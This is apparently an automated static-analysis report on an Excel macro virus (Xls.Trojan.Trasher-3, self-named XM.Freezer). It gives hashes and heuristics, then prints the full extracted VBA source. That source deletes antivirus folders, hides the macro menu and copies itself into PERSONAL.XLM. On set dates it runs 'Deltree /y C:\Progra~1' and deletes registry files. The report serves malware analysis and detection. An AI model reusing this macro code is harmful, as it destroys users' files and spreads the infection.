Xls.Trojan.Trasher-3 — Office (OLE) malware analysis

Static analysis result for SHA-256 ada7eb288c5511c1…

MALICIOUS

Office (OLE)

22.0 KB Created: 1998-02-12 17:58:36 Authoring application: Microsoft Excel First seen: 2012-06-14
MD5: 35a6f3124b51e45c953be5598492e57e SHA-1: 160f268e2840b8e4a4b62907008ad830d32bd835 SHA-256: ada7eb288c5511c125fa90d023287458c659184d6dba7acc7177d2e5928b6959
320 Risk Score

Malware Insights

Xls.Trojan.Trasher-3 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic

The sample is a malicious Excel file containing VBA macros. The Auto_Open macro attempts to disable antivirus software by deleting files from known AV installation directories and removes macro menu items. The `Shell()` call and the `Auto_Open` and `Auto_Close` macros indicate an attempt to execute arbitrary commands and potentially install persistence or download further payloads.

Heuristics 6

  • ClamAV: Xls.Trojan.Trasher-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Trojan.Trasher-3
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2451 bytes
SHA-256: 26eef91e9f6cc772cb633fd69a452b8650309ce302ff5aa58f44c56eeb9eac55
Detection
ClamAV: Xls.Trojan.Trasher-3
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Sheet3"

'********************************
'* Name    : XM.Freezer         *
'* Created : February 5, 1998   *
'* Author  : ULTRAS             *
'********************************
Sub Auto_Open()
Attribute Auto_Open.VB_ProcData.VB_Invoke_Func = " \n14"
On Error Resume Next
Call Auto_Close
Kill "C:\Program Files\AntiViral Toolkit Pro\*.*"
MenuBars(xlWorksheet).Menus("Tools").MenuItems("&Macro...").Delete
Kill "C:\Program Files\FindVirus\*.*"
MenuBars(xlModule).Menus("Tools").MenuItems("&Macro...").Delete
Kill "C:\f-macro\*.*"
MenuBars(xlNoDocuments).Menus("Tools").MenuItems("&Macro...").Delete
Kill "C:\Program Files\Command Software\F-PROT95\*.*"
MenuBars(xlInfo).Menus("Tools").MenuItems("&Macro...").Delete
Kill "C:\Program Files\McAfee\VirusScan\*.*"
MenuBars(xlChart).Menus("Tools").MenuItems("&Macro...").Delete
Kill "C:\Program Files\Norton AntiVirus\*.*"
Call Joke
End Sub

Sub Auto_Close()
Attribute Auto_Close.VB_ProcData.VB_Invoke_Func = " \n14"
On Error Resume Next
ULTRAS = 0
Freezer = 0
Application.ScreenUpdating = False
For b = 1 To Application.Workbooks.Count
If Application.Workbooks(b).Name = "PERSONAL.XLM" Then
ULTRAS = 1
For u = 1 To Application.Workbooks("PERSONAL.XLM").Modules.Count
If Application.Workbooks("PERSONAL.XLM").Modules(u).Name = "Sheet3" Then
Freezer = 1
End If
Next
If Freezer = 0 Then
Windows("PERSONAL.XLM").Visible = True
Application.Workbooks("Freezer.XLM").Modules("Sheet3").Copy after:=Application.Workbooks("PERSONAL.XLM").Modules(1)
Windows("PERSONAL.XLM").Visible = False
Application.Workbooks("PERSONAL.XLM").Save
End If
End If
Next
If ULTRAS = 0 Then
newname$ = ActiveWorkbook.Name
Application.Workbooks(newname$).SaveCopyAs Application.StartupPath + "\PERSONAL.XLM"
Application.Workbooks.Open (Application.StartupPath + "\PERSONAL.XLM")
Windows("PERSONAL.XLM").Visible = False
Application.Workbooks("PERSONAL.XLM").Save
End If
Application.ScreenUpdating = True
End Sub

Sub Joke()
Attribute Joke.VB_ProcData.VB_Invoke_Func = " \n14"
On Error GoTo HaHaHa
If Day(Now()) = 14 Then
MsgBox "You Infected XM.Freezer by ULTRAS", 16, "ULTRAS"
Shell ("Deltree  /y C:\Progra~1")
End If
If Day(Now()) = 28 Then
MsgBox "You Infected XM.Freezer by ULTRAS", 48, "ULTRAS"
SetAttr "c:\windows\user.dat", 0
SetAttr "c:\windows\user.da0", 0
Kill "c:\windows\user.dat"
Kill "c:\windows\user.da0"
End If
HaHaHa:
End Sub